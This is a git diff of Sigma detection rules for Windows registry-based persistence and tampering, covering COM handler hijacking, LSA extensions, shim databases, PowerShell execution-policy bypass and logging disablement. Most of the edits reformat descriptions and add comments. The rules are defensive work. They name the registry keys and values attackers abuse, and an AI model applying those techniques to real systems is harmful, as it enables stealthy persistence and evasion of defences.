\CLSID\{DD75716E-B42E-4978-BB60-1497B92E30C4}\ - - \CLSID\{E2F83EED-62DE-4A9F-9CD0-A1D40DCD13B6}\ - - \CLSID\{E772CEB3-E203-4828-ADF1-765713D981B8}\ - - \CLSID\{eec97550-47a9-11cf-b952-00aa0051fe20} - - \CLSID\{FB10BD80-A331-4e9e-9EB7-00279903AD99}\ + # TODO: Add the default extension PersistentHandler. + # Note this could also offer blindspot as the attacker could use on of these and hijack them + - \CLSID\{4F46F75F-199F-4C63-8B7D-86D48FE7970C}\ # Office Open XML Format PowerPoint Persistent Handler + - \CLSID\{4887767F-7ADC-4983-B576-88FB643D6F79}\ # Office Open XML Format Excel Persistent Handler + - \CLSID\{D3B41FA1-01E3-49AF-AA25-1D0D824275AE}\ # Office Open XML Format Word Persistent Handler + - \CLSID\{72773E1A-B711-4d8d-81FA-B9A43B0650DD}\ # Microsoft OneNote Windows Desktop Search IFilter Persistent handler + - \CLSID\{098f2470-bae0-11cd-b579-08002b30bfeb}\ # Null persistent handler + - \CLSID\{1AA9BF05-9A97-48c1-BA28-D9DCE795E93C}\ # PDF Persistent Handler + - \CLSID\{2e2294a9-50d7-4fe7-a09f-e6492e185884}\ # rtf persistent handler + - \CLSID\{34CEAC8D-CBC0-4f77-B7B1-8A60CB6DA0F7}\ # Open Document Format ODT Persistent Handler + - \CLSID\{3B224B11-9363-407e-850F-C9E1FFACD8FB}\ # Zip Persistent Handler + - \CLSID\{3DDEB7A4-8ABF-4D82-B9EE-E1F4552E95BE}\ # Open Document Format ODS Persistent Handler + - \CLSID\{5645C8C1-E277-11CF-8FDA-00AA00A14F93}\ # Related to MIME Filter + - \CLSID\{5645C8C4-E277-11CF-8FDA-00AA00A14F93}\ # Related to MIME Filter + - \CLSID\{58A9EBF6-5755-4554-A67E-A2467AD1447B}\ # Setting Content File Persistent Handler + - \CLSID\{5e941d80-bf96-11cd-b579-08002b30bfeb}\ # Plain Text persistent handler + - \CLSID\{698A4FFC-63A3-4E70-8F00-376AD29363FB}\ # Wordpad OOXML Document Filter + - \CLSID\{7E9D8D44-6926-426F-AA2B-217A819A5CCE}\ # XML File Persistent Handler + - \CLSID\{8CD34779-9F10-4f9b-ADFB-B3FAEABDAB5A}\ # .url File Persistent Handler + - \CLSID\{9694E38A-E081-46ac-99A0-8743C909ACB6}\ # html persistent handler for mapi email + - \CLSID\{98de59a0-d175-11cd-a7bd-00006b827d94}\ # Microsoft Office Persistent Handler + - \CLSID\{AA10385A-F5AA-4EFF-B3DF-71B701E25E18}\ # Wordpad ODT Document Filter + - \CLSID\{B4132098-7A03-423D-9463-163CB07C151F}\ # Office Open XML Format Excel Persistent Handler + - \CLSID\{d044309b-5da6-4633-b085-4ed02522e5a5}\ # App Content File Persistent Handler + - \CLSID\{D169C14A-5148-4322-92C8-754FC9D018D8}\ # rtf persistent handler for mapi email + - \CLSID\{DD75716E-B42E-4978-BB60-1497B92E30C4}\ # text persistent handler for mapi email + - \CLSID\{E2F83EED-62DE-4A9F-9CD0-A1D40DCD13B6}\ # Open Document Format ODP Persistent Handler + - \CLSID\{E772CEB3-E203-4828-ADF1-765713D981B8}\ # Microsoft OneNote Section persistent handler + - \CLSID\{eec97550-47a9-11cf-b952-00aa0051fe20} # HTML File persistent handler + # - '\CLSID\{F6F00E65-9CAF-43BB-809A-38AA4621BCF2}' # XMind Persistent Handler (not present by default) + - \CLSID\{FB10BD80-A331-4e9e-9EB7-00279903AD99}\ # Office Outlook MSG Persistent Handler filter_generic_paths: Image|startswith: + # We assume if an attacker has access to one of these directories. Then he already has admin. - C:\Windows\System32\ - C:\Program Files (x86)\ - C:\Program Files\ diff --git a/sigma/sysmon/registry/registry_set/registry_set_persistence_lsa_extension.yml b/sigma/sysmon/registry/registry_set/registry_set_persistence_lsa_extension.yml index 65fbe4957..e94b75516 100644 --- a/sigma/sysmon/registry/registry_set/registry_set_persistence_lsa_extension.yml +++ b/sigma/sysmon/registry/registry_set/registry_set_persistence_lsa_extension.yml @@ -1,13 +1,9 @@ title: Potential Persistence Via LSA Extensions id: 41f6531d-af6e-4c6e-918f-b946f2b85a36 status: experimental -description: 'Detects when an attacker modifies the "REG_MULTI_SZ" value named "Extensions" - to include a custom DLL to achieve persistence via lsass. - - The "Extensions" list contains filenames of DLLs being automatically loaded by - lsass.exe. Each DLL has its InitializeLsaExtension() method called after loading. - - ' +description: | + Detects when an attacker modifies the "REG_MULTI_SZ" value named "Extensions" to include a custom DLL to achieve persistence via lsass. + The "Extensions" list contains filenames of DLLs being automatically loaded by lsass.exe. Each DLL has its InitializeLsaExtension() method called after loading. references: - https://persistence-info.github.io/Data/lsaaextension.html - https://twitter.com/0gtweet/status/1476286368385019906 diff --git a/sigma/sysmon/registry/registry_set/registry_set_persistence_mpnotify.yml b/sigma/sysmon/registry/registry_set/registry_set_persistence_mpnotify.yml index 19cc20871..a3e1ca9b4 100644 --- a/sigma/sysmon/registry/registry_set/registry_set_persistence_mpnotify.yml +++ b/sigma/sysmon/registry/registry_set/registry_set_persistence_mpnotify.yml @@ -1,8 +1,7 @@ title: Potential Persistence Via Mpnotify id: 92772523-d9c1-4c93-9547-b0ca500baba3 status: experimental -description: Detects when an attacker register a new SIP provider for persistence - and defense evasion +description: Detects when an attacker register a new SIP provider for persistence and defense evasion references: - https://persistence-info.github.io/Data/mpnotify.html - https://www.youtube.com/watch?v=ggY3srD9dYs&ab_channel=GrzegorzTworek @@ -23,7 +22,6 @@ detection: TargetObject|contains: \SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\mpnotify condition: registry_set and selection falsepositives: - - Might trigger if a legitimate new SIP provider is registered. But this is not - a common occurrence in an environment and should be investigated either way + - Might trigger if a legitimate new SIP provider is registered. But this is not a common occurrence in an environment and should be investigated either way level: high ruletype: Sigma diff --git a/sigma/sysmon/registry/registry_set/registry_set_persistence_mycomputer.yml b/sigma/sysmon/registry/registry_set/registry_set_persistence_mycomputer.yml index 3038d073f..5590f83e9 100644 --- a/sigma/sysmon/registry/registry_set/registry_set_persistence_mycomputer.yml +++ b/sigma/sysmon/registry/registry_set/registry_set_persistence_mycomputer.yml @@ -1,9 +1,7 @@ title: Potential Persistence Via MyComputer Registry Keys id: 8fbe98a8-8f9d-44f8-aa71-8c572e29ef06 status: experimental -description: Detects modification to the "Default" value of the "MyComputer" key and - subkeys to point to a custom binary that will be launched whenever the associated - action is executed (see reference section for example) +description: Detects modification to the "Default" value of the "MyComputer" key and subkeys to point to a custom binary that will be launched whenever the associated action is executed (see reference section for example) references: - https://www.hexacorn.com/blog/2017/01/18/beyond-good-ol-run-key-part-55/ author: Nasreddine Bencherchali (Nextron Systems) @@ -24,7 +22,6 @@ detection: TargetObject|endswith: (Default) condition: registry_set and selection falsepositives: - - Unlikely but if you experience FPs add specific processes and locations you - would like to monitor for + - Unlikely but if you experience FPs add specific processes and locations you would like to monitor for level: high ruletype: Sigma diff --git a/sigma/sysmon/registry/registry_set/registry_set_persistence_natural_language.yml b/sigma/sysmon/registry/registry_set/registry_set_persistence_natural_language.yml index 8302ea501..1b883782b 100644 --- a/sigma/sysmon/registry/registry_set/registry_set_persistence_natural_language.yml +++ b/sigma/sysmon/registry/registry_set/registry_set_persistence_natural_language.yml @@ -1,9 +1,7 @@ title: Potential Persistence Via DLLPathOverride id: a1b1fd53-9c4a-444c-bae0-34a330fc7aa8 status: experimental -description: Detects when an attacker adds a new "DLLPathOverride" value to the "Natural - Language" key in order to achieve persistence which will get invoked by "SearchIndexer.exe" - process +description: Detects when an attacker adds a new "DLLPathOverride" value to the "Natural Language" key in order to achieve persistence which will get invoked by "SearchIndexer.exe" process references: - https://persistence-info.github.io/Data/naturallanguage6.html - https://www.hexacorn.com/blog/2018/12/30/beyond-good-ol-run-key-part-98/ @@ -21,6 +19,10 @@ detection: EventID: 13 Channel: Microsoft-Windows-Sysmon/Operational selection_root: + # The path can be for multiple languages + # Example: HKLM\System\CurrentControlSet\Control\ContentIndex\Language\English_UK + # HKLM\System\CurrentControlSet\Control\ContentIndex\Language\English_US + # HKLM\System\CurrentControlSet\Control\ContentIndex\Language\Neutral TargetObject|contains: \SYSTEM\CurrentControlSet\Control\ContentIndex\Language\ selection_values: TargetObject|contains: diff --git a/sigma/sysmon/registry/registry_set/registry_set_persistence_office_vsto.yml b/sigma/sysmon/registry/registry_set/registry_set_persistence_office_vsto.yml index e9ce61039..9d502a7a1 100644 --- a/sigma/sysmon/registry/registry_set/registry_set_persistence_office_vsto.yml +++ b/sigma/sysmon/registry/registry_set/registry_set_persistence_office_vsto.yml @@ -1,8 +1,7 @@ title: Potential Persistence Via Visual Studio Tools for Office id: 9d15044a-7cfe-4d23-8085-6ebc11df7685 status: experimental -description: Detects persistence via Visual Studio Tools for Office (VSTO) add-ins - in Office applications. +description: Detects persistence via Visual Studio Tools for Office (VSTO) add-ins in Office applications. references: - https://twitter.com/_vivami/status/1347925307643355138 - https://vanmieghem.io/stealth-outlook-persistence/ @@ -30,7 +29,8 @@ detection: filter_image: Image|endswith: - \msiexec.exe - - \regsvr32.exe + - \regsvr32.exe # e.g. default Evernote installation + # triggered by a default Office 2019 installation filter_office: Image|endswith: - \excel.exe diff --git a/sigma/sysmon/registry/registry_set/registry_set_persistence_outlook_todaypage.yml b/sigma/sysmon/registry/registry_set/registry_set_persistence_outlook_todaypage.yml index 397fd950d..8eebc02e2 100644 --- a/sigma/sysmon/registry/registry_set/registry_set_persistence_outlook_todaypage.yml +++ b/sigma/sysmon/registry/registry_set/registry_set_persistence_outlook_todaypage.yml @@ -1,9 +1,7 @@ title: Potential Persistence Via Outlook Today Pages id: 487bb375-12ef-41f6-baae-c6a1572b4dd1 status: experimental -description: Detects potential persistence activity via outlook today pages. An attacker - can set a custom page to execute arbitrary code and link to it via the registry - key "UserDefinedUrl". +description: Detects potential persistence activity via outlook today pages. An attacker can set a custom page to execute arbitrary code and link to it via the registry key "UserDefinedUrl". references: - https://speakerdeck.com/heirhabarov/hunting-for-persistence-via-microsoft-exchange-server-or-outlook?slide=74 author: Tobias Michalski (Nextron Systems) @@ -34,8 +32,7 @@ detection: - C:\Program Files\Common Files\Microsoft Shared\ClickToRun\ - C:\Program Files\Common Files\Microsoft Shared\ClickToRun\Updates\ Image|endswith: \OfficeClickToRun.exe - condition: registry_set and (selection_main and 1 of selection_value_* and not - 1 of filter_*) + condition: registry_set and (selection_main and 1 of selection_value_* and not 1 of filter_*) fields: - Details falsepositives: diff --git a/sigma/sysmon/registry/registry_set/registry_set_persistence_reflectdebugger.yml b/sigma/sysmon/registry/registry_set/registry_set_persistence_reflectdebugger.yml index 995f35e51..8e47ae305 100644 --- a/sigma/sysmon/registry/registry_set/registry_set_persistence_reflectdebugger.yml +++ b/sigma/sysmon/registry/registry_set/registry_set_persistence_reflectdebugger.yml @@ -1,11 +1,10 @@ title: Potential WerFault ReflectDebugger Registry Value Abuse id: 0cf2e1c6-8d10-4273-8059-738778f981ad related: - - id: fabfb3a7-3ce1-4445-9c7c-3c27f1051cdd - type: derived + - id: fabfb3a7-3ce1-4445-9c7c-3c27f1051cdd + type: derived status: experimental -description: Detects potential WerFault "ReflectDebugger" registry value abuse for - persistence. +description: Detects potential WerFault "ReflectDebugger" registry value abuse for persistence. references: - https://cocomelonc.github.io/malware/2022/11/02/malware-pers-18.html - https://www.hexacorn.com/blog/2018/08/31/beyond-good-ol-run-key-part-85/ @@ -23,7 +22,7 @@ detection: EventID: 13 Channel: Microsoft-Windows-Sysmon/Operational selection: - EventType: SetValue + EventType: SetValue TargetObject|endswith: \Microsoft\Windows\Windows Error Reporting\Hangs\ReflectDebugger condition: registry_set and selection falsepositives: diff --git a/sigma/sysmon/registry/registry_set/registry_set_persistence_scrobj_dll.yml b/sigma/sysmon/registry/registry_set/registry_set_persistence_scrobj_dll.yml index 38f47eb37..80a0b9dc7 100644 --- a/sigma/sysmon/registry/registry_set/registry_set_persistence_scrobj_dll.yml +++ b/sigma/sysmon/registry/registry_set/registry_set_persistence_scrobj_dll.yml @@ -1,8 +1,7 @@ title: Potential Persistence Via Scrobj.dll COM Hijacking id: fe20dda1-6f37-4379-bbe0-a98d400cae90 status: experimental -description: Detect use of scrobj.dll as this DLL looks for the ScriptletURL key to - get the location of the script to execute +description: Detect use of scrobj.dll as this DLL looks for the ScriptletURL key to get the location of the script to execute references: - https://github.com/redcanaryco/atomic-red-team/blob/40b77d63808dd4f4eafb83949805636735a1fd15/atomics/T1546.015/T1546.015.md author: frack113 diff --git a/sigma/sysmon/registry/registry_set/registry_set_persistence_search_order.yml b/sigma/sysmon/registry/registry_set/registry_set_persistence_search_order.yml index 360b1f4f5..fb38b393f 100644 --- a/sigma/sysmon/registry/registry_set/registry_set_persistence_search_order.yml +++ b/sigma/sysmon/registry/registry_set/registry_set_persistence_search_order.yml @@ -4,7 +4,7 @@ status: experimental description: Detects potential COM object hijacking leveraging the COM Search Order references: - https://www.cyberbit.com/blog/endpoint-security/com-hijacking-windows-overlooked-security-vulnerability/ -author: "Maxime Thiebaut (@0xThiebaut), oscd.community, C\xE9dric Hien" +author: Maxime Thiebaut (@0xThiebaut), oscd.community, Cédric Hien date: 2020/04/14 modified: 2023/09/28 tags: @@ -18,15 +18,16 @@ detection: registry_set: EventID: 13 Channel: Microsoft-Windows-Sysmon/Operational - selection: + selection: # Detect new COM servers in the user hive TargetObject|contains: \CLSID\ TargetObject|endswith: \InprocServer32\(Default) filter_main_generic: - Details|contains: + Details|contains: # Exclude privileged directories and observed FPs - '%%systemroot%%\system32\' - '%%systemroot%%\SysWow64\' filter_main_onedrive: Details|contains: + # Related To OneDrive - \AppData\Local\Microsoft\OneDrive\ - \FileCoAuthLib64.dll - \FileSyncShell64.dll @@ -42,7 +43,7 @@ detection: - \AppData\Roaming\Dropbox\ - \DropboxExt64.*.dll filter_main_trend_micro: - Details|endswith: TmopIEPlg.dll + Details|endswith: TmopIEPlg.dll # TrendMicro osce filter_main_update: Image|endswith: - :\WINDOWS\system32\wuauclt.exe diff --git a/sigma/sysmon/registry/registry_set/registry_set_persistence_shim_database.yml b/sigma/sysmon/registry/registry_set/registry_set_persistence_shim_database.yml index 435ecf0e2..d13a31a2a 100644 --- a/sigma/sysmon/registry/registry_set/registry_set_persistence_shim_database.yml +++ b/sigma/sysmon/registry/registry_set/registry_set_persistence_shim_database.yml @@ -1,14 +1,9 @@ title: Potential Persistence Via Shim Database Modification id: dfb5b4e8-91d0-4291-b40a-e3b0d3942c45 status: experimental -description: 'Adversaries may establish persistence and/or elevate privileges by executing - malicious content triggered by application shims. - - The Microsoft Windows Application Compatibility Infrastructure/Framework (Application - Shim) was created to allow for backward compatibility of software as the operating - system codebase changes over time - - ' +description: | + Adversaries may establish persistence and/or elevate privileges by executing malicious content triggered by application shims. + The Microsoft Windows Application Compatibility Infrastructure/Framework (Application Shim) was created to allow for backward compatibility of software as the operating system codebase changes over time references: - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1546.011/T1546.011.md#atomic-test-3---registry-key-creation-andor-modification-events-for-sdb - https://www.fireeye.com/blog/threat-research/2017/05/fin7-shim-databases-persistence.html diff --git a/sigma/sysmon/registry/registry_set/registry_set_persistence_shim_database_susp_application.yml b/sigma/sysmon/registry/registry_set/registry_set_persistence_shim_database_susp_application.yml index 2dfc6b50c..98c8b64a0 100644 --- a/sigma/sysmon/registry/registry_set/registry_set_persistence_shim_database_susp_application.yml +++ b/sigma/sysmon/registry/registry_set/registry_set_persistence_shim_database_susp_application.yml @@ -1,8 +1,7 @@ title: Suspicious Shim Database Patching Activity id: bf344fea-d947-4ef4-9192-34d008315d3a status: experimental -description: Detects installation of new shim databases that try to patch sections - of known processes for potential process injection or persistence. +description: Detects installation of new shim databases that try to patch sections of known processes for potential process injection or persistence. references: - https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/pillowmint-fin7s-monkey-thief/ - https://www.fireeye.com/blog/threat-research/2017/05/fin7-shim-databases-persistence.html @@ -23,6 +22,7 @@ detection: selection: TargetObject|contains: \SOFTWARE\Microsoft\Windows NT\CurrentVersion\AppCompatFlags\Custom\ TargetObject|endswith: + # Note: add other application to increase coverage - \csrss.exe - \dllhost.exe - \explorer.exe diff --git a/sigma/sysmon/registry/registry_set/registry_set_persistence_shim_database_uncommon_location.yml b/sigma/sysmon/registry/registry_set/registry_set_persistence_shim_database_uncommon_location.yml index 2a1e1ac2c..16b92a7bf 100644 --- a/sigma/sysmon/registry/registry_set/registry_set_persistence_shim_database_uncommon_location.yml +++ b/sigma/sysmon/registry/registry_set/registry_set_persistence_shim_database_uncommon_location.yml @@ -1,8 +1,7 @@ title: Potential Persistence Via Shim Database In Uncommon Location id: 6b6976a3-b0e6-4723-ac24-ae38a737af41 status: experimental -description: Detects the installation of a new shim database where the file is located - in a non-default location +description: Detects the installation of a new shim database where the file is located in a non-default location references: - https://www.fireeye.com/blog/threat-research/2017/05/fin7-shim-databases-persistence.html - https://andreafortuna.org/2018/11/12/process-injection-and-persistence-using-application-shimming/ diff --git a/sigma/sysmon/registry/registry_set/registry_set_persistence_typed_paths.yml b/sigma/sysmon/registry/registry_set/registry_set_persistence_typed_paths.yml index ce127728d..c94dadf14 100644 --- a/sigma/sysmon/registry/registry_set/registry_set_persistence_typed_paths.yml +++ b/sigma/sysmon/registry/registry_set/registry_set_persistence_typed_paths.yml @@ -1,9 +1,7 @@ title: Potential Persistence Via TypedPaths id: 086ae989-9ca6-4fe7-895a-759c5544f247 status: experimental -description: Detects modification addition to the 'TypedPaths' key in the user or - admin registry from a non standard application. Which might indicate persistence - attempt +description: Detects modification addition to the 'TypedPaths' key in the user or admin registry from a non standard application. Which might indicate persistence attempt references: - https://twitter.com/dez_/status/1560101453150257154 - https://forensafe.com/blogs/typedpaths.html diff --git a/sigma/sysmon/registry/registry_set/registry_set_persistence_xll.yml b/sigma/sysmon/registry/registry_set/registry_set_persistence_xll.yml index a59bba7f7..991c94dd5 100644 --- a/sigma/sysmon/registry/registry_set/registry_set_persistence_xll.yml +++ b/sigma/sysmon/registry/registry_set/registry_set_persistence_xll.yml @@ -1,8 +1,7 @@ title: Potential Persistence Via Excel Add-in - Registry id: 961e33d1-4f86-4fcf-80ab-930a708b2f82 status: experimental -description: Detect potential persistence via the creation of an excel add-in (XLL) - file to make it run automatically when Excel is started. +description: Detect potential persistence via the creation of an excel add-in (XLL) file to make it run automatically when Excel is started. references: - https://github.com/redcanaryco/atomic-red-team/blob/4ae9580a1a8772db87a1b6cdb0d03e5af231e966/atomics/T1137.006/T1137.006.md - https://labs.withsecure.com/publications/add-in-opportunities-for-office-persistence diff --git a/sigma/sysmon/registry/registry_set/registry_set_policies_associations_tamper.yml b/sigma/sysmon/registry/registry_set/registry_set_policies_associations_tamper.yml index 8850b339b..4232adfa8 100644 --- a/sigma/sysmon/registry/registry_set/registry_set_policies_associations_tamper.yml +++ b/sigma/sysmon/registry/registry_set/registry_set_policies_associations_tamper.yml @@ -1,8 +1,7 @@ title: Potential Attachment Manager Settings Associations Tamper id: a9b6c011-ab69-4ddb-bc0a-c4f21c80ec47 status: experimental -description: Detects tampering with attachment manager settings policies associations - to lower the default file type risks (See reference for more information) +description: Detects tampering with attachment manager settings policies associations to lower the default file type risks (See reference for more information) references: - https://support.microsoft.com/en-us/topic/information-about-the-attachment-manager-in-microsoft-windows-c48a4dcd-8de5-2af5-ee9b-cd795ae42738 - https://www.virustotal.com/gui/file/2bcd5702a7565952c44075ac6fb946c7780526640d1264f692c7664c02c68465 @@ -26,7 +25,7 @@ detection: Details: DWORD (0x00006152) selection_value_low_risk_filetypes: TargetObject|endswith: \LowRiskFileTypes - Details|contains: + Details|contains: # Add more as you see fit - .zip; - .rar; - .exe; diff --git a/sigma/sysmon/registry/registry_set/registry_set_policies_attachments_tamper.yml b/sigma/sysmon/registry/registry_set/registry_set_policies_attachments_tamper.yml index af290af52..61f7ecdbb 100644 --- a/sigma/sysmon/registry/registry_set/registry_set_policies_attachments_tamper.yml +++ b/sigma/sysmon/registry/registry_set/registry_set_policies_attachments_tamper.yml @@ -1,8 +1,7 @@ title: Potential Attachment Manager Settings Attachments Tamper id: ee77a5db-b0f3-4be2-bfd4-b58be1c6b15a status: experimental -description: Detects tampering with attachment manager settings policies attachments - (See reference for more information) +description: Detects tampering with attachment manager settings policies attachments (See reference for more information) references: - https://support.microsoft.com/en-us/topic/information-about-the-attachment-manager-in-microsoft-windows-c48a4dcd-8de5-2af5-ee9b-cd795ae42738 - https://www.virustotal.com/gui/file/2bcd5702a7565952c44075ac6fb946c7780526640d1264f692c7664c02c68465 @@ -23,13 +22,13 @@ detection: TargetObject|contains: \SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Attachments\ selection_value_hide_zone_info: TargetObject|endswith: \HideZoneInfoOnProperties - Details: DWORD (0x00000001) + Details: DWORD (0x00000001) # On selection_value_save_zone_info: TargetObject|endswith: \SaveZoneInformation - Details: DWORD (0x00000002) + Details: DWORD (0x00000002) # Off selection_value_scan_with_av: TargetObject|endswith: \ScanWithAntiVirus - Details: DWORD (0x00000001) + Details: DWORD (0x00000001) # Disabled condition: registry_set and (selection_main and 1 of selection_value_*) falsepositives: - Unlikely diff --git a/sigma/sysmon/registry/registry_set/registry_set_powershell_enablescripts_enabled.yml b/sigma/sysmon/registry/registry_set/registry_set_powershell_enablescripts_enabled.yml index be481bf29..e901b1066 100644 --- a/sigma/sysmon/registry/registry_set/registry_set_powershell_enablescripts_enabled.yml +++ b/sigma/sysmon/registry/registry_set/registry_set_powershell_enablescripts_enabled.yml @@ -1,11 +1,10 @@ title: PowerShell Script Execution Policy Enabled id: 8218c875-90b9-42e2-b60d-0b0069816d10 related: - - id: fad91067-08c5-4d1a-8d8c-d96a21b37814 - type: derived + - id: fad91067-08c5-4d1a-8d8c-d96a21b37814 + type: derived status: experimental -description: Detects the enabling of the PowerShell script execution policy. Once - enabled, this policy allows scripts to be executed. +description: Detects the enabling of the PowerShell script execution policy. Once enabled, this policy allows scripts to be executed. references: - https://admx.help/?Category=Windows_10_2016&Policy=Microsoft.Policies.PowerShell::EnableScripts author: Nasreddine Bencherchali (Nextron Systems), Thurein Oo diff --git a/sigma/sysmon/registry/registry_set/registry_set_powershell_execution_policy.yml b/sigma/sysmon/registry/registry_set/registry_set_powershell_execution_policy.yml index 5b5a2b4ed..494182301 100644 --- a/sigma/sysmon/registry/registry_set/registry_set_powershell_execution_policy.yml +++ b/sigma/sysmon/registry/registry_set/registry_set_powershell_execution_policy.yml @@ -1,15 +1,14 @@ title: Potential PowerShell Execution Policy Tampering id: fad91067-08c5-4d1a-8d8c-d96a21b37814 related: - - id: cf2e938e-9a3e-4fe8-a347-411642b28a9f - type: similar - - id: 87e3c4e8-a6a8-4ad9-bb4f-46e7ff99a180 - type: similar - - id: 61d0475c-173f-4844-86f7-f3eebae1c66b - type: similar + - id: cf2e938e-9a3e-4fe8-a347-411642b28a9f # Registry + type: similar + - id: 87e3c4e8-a6a8-4ad9-bb4f-46e7ff99a180 # ProcCreation Cmdlet + type: similar + - id: 61d0475c-173f-4844-86f7-f3eebae1c66b # PowerShell ScriptBlock + type: similar status: experimental -description: Detects changes to the PowerShell execution policy in order to bypass - signing requirements for script execution +description: Detects changes to the PowerShell execution policy in order to bypass signing requirements for script execution references: - https://learn.microsoft.com/en-us/powershell/module/microsoft.powershell.security/set-executionpolicy?view=powershell-7.3 author: Nasreddine Bencherchali (Nextron Systems) @@ -27,12 +26,16 @@ detection: Channel: Microsoft-Windows-Sysmon/Operational selection: TargetObject|endswith: + # Note for future readers: For PowerShell 7+ the ExecutionPolicy is handled via a setting file due to the fact that PWSH7 is available for mac and linux + # Attackers can create a per-user setting file (powershell.config.json) and set the execution policy there + # Learn more here: https://learn.microsoft.com/en-us/powershell/module/microsoft.powershell.core/about/about_powershell_config?view=powershell-7.3 - \ShellIds\Microsoft.PowerShell\ExecutionPolicy - \Policies\Microsoft\Windows\PowerShell\ExecutionPolicy Details|contains: - Bypass - Unrestricted filter_main_svchost: + # Note: We filter out "svchost" to avoid FP with changes using "gpedit" for example. Image|contains: - :\Windows\System32\ - :\Windows\SysWOW64\ diff --git a/sigma/sysmon/registry/registry_set/registry_set_powershell_in_run_keys.yml b/sigma/sysmon/registry/registry_set/registry_set_powershell_in_run_keys.yml index 2ac945a74..f0296afa8 100644 --- a/sigma/sysmon/registry/registry_set/registry_set_powershell_in_run_keys.yml +++ b/sigma/sysmon/registry/registry_set/registry_set_powershell_in_run_keys.yml @@ -20,7 +20,7 @@ detection: EventID: 13 Channel: Microsoft-Windows-Sysmon/Operational selection: - TargetObject|contains: \Software\Microsoft\Windows\CurrentVersion\Run + TargetObject|contains: \Software\Microsoft\Windows\CurrentVersion\Run # Also covers "RunOnce" and "RunOnceEx" Details|contains: - powershell - 'pwsh ' diff --git a/sigma/sysmon/registry/registry_set/registry_set_powershell_logging_disabled.yml b/sigma/sysmon/registry/registry_set/registry_set_powershell_logging_disabled.yml index 597e503e0..5e6e27153 100644 --- a/sigma/sysmon/registry/registry_set/registry_set_powershell_logging_disabled.yml +++ b/sigma/sysmon/registry/registry_set/registry_set_powershell_logging_disabled.yml @@ -1,9 +1,7 @@ title: PowerShell Logging Disabled Via Registry Key Tampering id: fecfd1a1-cc78-4313-a1ea-2ee2e8ec27a7 status: experimental -description: Detects changes to the registry for the currently logged-in user. In - order to disable PowerShell module logging, script block logging or transcription - and script execution logging +description: Detects changes to the registry for the currently logged-in user. In order to disable PowerShell module logging, script block logging or transcription and script execution logging references: - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1112/T1112.md#atomic-test-32---windows-powershell-logging-disabled author: frack113 @@ -22,8 +20,8 @@ detection: Channel: Microsoft-Windows-Sysmon/Operational selection: TargetObject|contains: - - \Microsoft\Windows\PowerShell\ - - \Microsoft\PowerShellCore\ + - \Microsoft\Windows\PowerShell\ # PowerShell 5 + - \Microsoft\PowerShellCore\ # PowerShell 7 TargetObject|endswith: - \ModuleLogging\EnableModuleLogging - \ScriptBlockLogging\EnableScriptBlockLogging diff --git a/sigma/sysmon/registry/registry_set/registry_set_provisioning_command_abuse.yml b/sigma/sysmon/registry/registry_set/registry_set_provisioning_command_abuse.yml index 418887a12..9fe54b93d 100644 --- a/sigma/sysmon/registry/registry_set/registry_set_provisioning_command_abuse.yml +++ b/sigma/sysmon/registry/registry_set/registry_set_provisioning_command_abuse.yml @@ -1,15 +1,14 @@ title: Potential Provisioning Registry Key Abuse For Binary Proxy Execution - REG id: 7021255e-5db3-4946-a8b9-0ba7a4644a69 related: - - id: 7f5d1c9a-3e83-48df-95a7-2b98aae6c13c - type: similar - - id: f9999590-1f94-4a34-a91e-951e47bedefd - type: similar - - id: 2a4b3e61-9d22-4e4a-b60f-6e8f0cde6f25 - type: similar + - id: 7f5d1c9a-3e83-48df-95a7-2b98aae6c13c # CLI Generic + type: similar + - id: f9999590-1f94-4a34-a91e-951e47bedefd # CLI Abuse + type: similar + - id: 2a4b3e61-9d22-4e4a-b60f-6e8f0cde6f25 # CLI Registry + type: similar status: experimental -description: Detects potential abuse of the provisioning registry key for indirect - command execution through "Provlaunch.exe". +description: Detects potential abuse of the provisioning registry key for indirect command execution through "Provlaunch.exe". references: - https://lolbas-project.github.io/lolbas/Binaries/Provlaunch/ - https://twitter.com/0gtweet/status/1674399582162153472 @@ -23,8 +22,7 @@ tags: logsource: category: registry_set product: windows - definition: 'Requirements: The registry key "\SOFTWARE\Microsoft\Provisioning\Commands\" - and its subkey must be monitored' + definition: 'Requirements: The registry key "\SOFTWARE\Microsoft\Provisioning\Commands\" and its subkey must be monitored' detection: registry_set: EventID: 13 diff --git a/sigma/sysmon/registry/registry_set/registry_set_renamed_sysinternals_eula_accepted.yml b/sigma/sysmon/registry/registry_set/registry_set_renamed_sysinternals_eula_accepted.yml index fee08a52f..f90d6b8b5 100644 --- a/sigma/sysmon/registry/registry_set/registry_set_renamed_sysinternals_eula_accepted.yml +++ b/sigma/sysmon/registry/registry_set/registry_set_renamed_sysinternals_eula_accepted.yml @@ -1,13 +1,12 @@ title: Usage of Renamed Sysinternals Tools - RegistrySet id: 8023f872-3f1d-4301-a384-801889917ab4 related: - - id: 25ffa65d-76d8-4da5-a832-3f2b0136e133 - type: derived - - id: f50f3c09-557d-492d-81db-9064a8d4e211 - type: similar + - id: 25ffa65d-76d8-4da5-a832-3f2b0136e133 + type: derived + - id: f50f3c09-557d-492d-81db-9064a8d4e211 + type: similar status: experimental -description: Detects non-sysinternals tools setting the "accepteula" key which normally - is set on sysinternals tool execution +description: Detects non-sysinternals tools setting the "accepteula" key which normally is set on sysinternals tool execution references: - Internal Research author: Nasreddine Bencherchali (Nextron Systems) @@ -54,9 +53,8 @@ detection: - \ADExplorer.exe - \ADExplorer64.exe filter_optional_null: - Image: null - condition: registry_set and (selection and not 1 of filter_main_* and not 1 of - filter_optional_*) + Image: # Race condition with some logging tools + condition: registry_set and (selection and not 1 of filter_main_* and not 1 of filter_optional_*) falsepositives: - Unlikely level: high diff --git a/sigma/sysmon/registry/registry_set/registry_set_rpcrt4_etw_tamper.yml b/sigma/sysmon/registry/registry_set/registry_set_rpcrt4_etw_tamper.yml index 2868b9b28..92488ce5c 100644 --- a/sigma/sysmon/registry/registry_set/registry_set_rpcrt4_etw_tamper.yml +++ b/sigma/sysmon/registry/registry_set/registry_set_rpcrt4_etw_tamper.yml @@ -1,8 +1,7 @@ title: ETW Logging Disabled For rpcrt4.dll id: 90f342e1-1aaa-4e43-b092-39fda57ed11e status: experimental -description: Detects changes to the 